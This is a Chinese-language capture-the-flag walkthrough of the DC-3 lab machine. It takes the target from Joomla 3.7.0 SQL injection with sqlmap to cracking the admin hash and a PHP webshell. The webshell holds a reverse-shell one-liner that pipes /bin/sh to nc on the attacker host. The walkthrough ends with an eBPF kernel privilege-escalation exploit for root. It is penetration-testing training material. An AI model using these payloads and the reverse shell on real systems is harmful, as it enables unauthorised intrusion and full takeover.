一、确定目标
目标:there is only one flag, one entry point and no clues at all.
二、信息收集
1、主机发现
扫描网络得到目标主机IP(nmap不如arp-scan速度快)
arp-scan -l |grep 192.168.11
┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1 00:50:56:c0:00:08 VMware, Inc.
192.168.11.1 00:50:56:fe:d0:93 VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7 VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6 VMware, Inc.
目标IP:192.168.11.140
2、端口扫描
使用nmap进行端口扫描
nmap -A -Pn -p0-65535 192.168.11.140
┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.11.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds
3、服务发现
目标主机仅开放80端口的Web服务,使用Joomla的CMS。
4、Web路径爆破
dirsearch -u 192.168.11.140 -e * -x 403
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006
Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt
Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log
Target: http://192.168.11.140/
[09:43:26] Starting:
[09:43:28] 200 - 18KB - /LICENSE.txt
[09:43:29] 200 - 4KB - /README.txt
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 - 2KB - /administrator/includes/
[09:43:31] 200 - 31B - /administrator/cache/
[09:43:31] 200 - 5KB - /administrator/
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 - 31B - /administrator/logs/
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/
[09:43:32] 200 - 31B - /bin/
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/
[09:43:32] 200 - 31B - /cache/
[09:43:32] 200 - 31B - /cli/
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 - 31B - /components/
[09:43:33] 200 - 0B - /configuration.php
[09:43:35] 200 - 3KB - /htaccess.txt
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/
[09:43:35] 200 - 31B - /images/
[09:43:35] 200 - 31B - /includes/
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/
[09:43:35] 200 - 7KB - /index.php
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/
[09:43:36] 200 - 31B - /layouts/
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/
[09:43:36] 200 - 31B - /libraries/
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/
[09:43:36] 200 - 31B - /media/
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/
[09:43:37] 200 - 31B - /modules/
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/
[09:43:38] 200 - 31B - /plugins/
[09:43:39] 200 - 836B - /robots.txt.dist
[09:43:41] 200 - 31B - /templates/
[09:43:41] 200 - 0B - /templates/system/
[09:43:41] 200 - 31B - /templates/index.html
[09:43:41] 200 - 0B - /templates/beez3/
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/
[09:43:41] 200 - 0B - /templates/protostar/
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/
[09:43:41] 200 - 31B - /tmp/
[09:43:42] 200 - 2KB - /web.config.txt
Task Completed
读取/robots.txt.dist文件,发现后台登陆界面http://192.168.11.140/administrator/
猜测/templates/beez3/和/templates/protostar/应该是模板文件路径。
5、Web侦察
主页提示靶机只有一个flag,且获得flag必须获得root权限。
6、漏洞发现
使用Joomla专用扫描器joomscan扫描。
joomscan -u http://192.168.11.140/
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.11.140/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.11.140/
可以看到joomla基本信息
-
详细版本号:Joomla 3.7.0
通过searchsploit查看是否有可用EXP。
searchsploit Joomla 3.7.0
┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
可以看到有一个SQL注入漏洞和一个XSS漏洞,显然SQL注入漏洞才有更大可能使我们获取管理员账号密码登陆管理后台。
三、漏洞分析
查找并打开php/webapps/42033.txt文件
locate php/webapps/42033.txt
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt
┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
发现文档要求使用以指定语句运行sqlmap进行数据库爆破。
四、漏洞利用
1、SQL注入
1.1 爆库
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
发现joomladb数据库
1.2 爆表
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
发现#__users表
1.3 爆字段
注:
-
询问是否要使用公共列存在性检查时手动选择选y进行爆破,一路回车爆不出字段。
-
回车键选择默认字典“/usr/share/sqlmap/data/txt/common columns.txt”
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
发现id、name、password和username字段。
1.4 查询字段内容
sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]
Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+
发现密码经过HASH加密
2、HASH解密
2.1 保存密文
将密文保存到文件admin中
vi admin
┌──(root㉿kali)-[~]
└─# vi admin
┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
2.2 使用john爆破
注:这里已经爆破了一遍,使用show参数查看
john admin
john -show admin
┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy
1 password hash cracked, 0 left
解密后的结果为:snoopy
账号:admin
密码:snoopy
2.3 登陆后台
尝试账号密码成功登陆管理后台http://192.168.11.140/administrator/
3、文件上传漏洞
3.1 上传文件
进入后台后,通过编辑模板上传webshell。
Extensions --> Templates --> Templates
编辑哪一个都可以,在这编辑Beez3模板。
在html目录下创建名为shell.php的webshell(创建+保存),内容为:
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>
3.2 反弹SHELL
想要反弹webshell就要知道路径,前面Web路径爆破的时候爆出了模板路径,这里使用beez3模板,路径应该为:
发现为空白页,结合模板暴露的路径,尝试访问http://192.168.11.140/templates/beez3/html
发现了上传的shell.php文件,在kali中启动监听
nc -lvnp 6666
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
访问shell.php:
访问后成功建立连接拿到Shell。
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$
五、提权
无法进入root家目录,接下来就是想办法提权。
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root
1、获取EXP
lsb_release命令补充:
LSB是Linux Standard Base(Linux标准库)的缩写, lsb_release命令用来与具体Linux发行版相关的Linux标准库信息。
注:LSB的译法有Linux标准库,Linux标准规范。CentOS最小化安装时默认没有这个命令,需要安装lsb_release使用命令。
1.1 查看系统内核
uname -a
lsb_release -a
$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
1.2 查找内核漏洞
搜索基于4.4.0-21-generic内核的Ubuntu 16.04 LTS版本相关内核漏洞
searchsploit 4.4. Ubuntu 16.04
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt
1.3 查找并查看文件
locate linux/local/39772.txt
vi /usr/share/exploitdb/exploits/linux/local/39772.txt
┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt
┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt
1.4 下载EXP
在文件的最后一行可以找到EXP链接
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”
39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s
2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])
2、EXP传至靶机
kali开启http服务
python -m http.server 8888
┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
靶机去/tmp目录下下载39772.zip文件
cd /tmp
wget 192.168.11.128:8888/39772.zip
$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 1.92G=0s
2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]
$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root
3、本地提权
接下来就是解压、编译、执行EXP来获得root权限
3.1 解压EXP
解压39772.zip之后进入文件夹39772,再对exploit.tar文件进行解压得到ebpf_mapfd_doubleput_exploit文件。
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
3.2 执行EXP
-
查看EXP发现没有执行权限,先赋予权限。
-
进入ebpf_mapfd_doubleput_exploit目录
-
编译compile.sh文件
-
执行编译好的doubleput文件
-
提示
we have root privs now...获取root权限
ls -Rl ebpf_mapfd_doubleput_exploit
chmod -R 777 ebpf_mapfd_doubleput_exploit
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
至此成功提权。
六、后渗透(查找flag)
在root家目录中发现flag
cd /root
cat the-flag.txt
cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
至此打靶完成,游戏结束OVO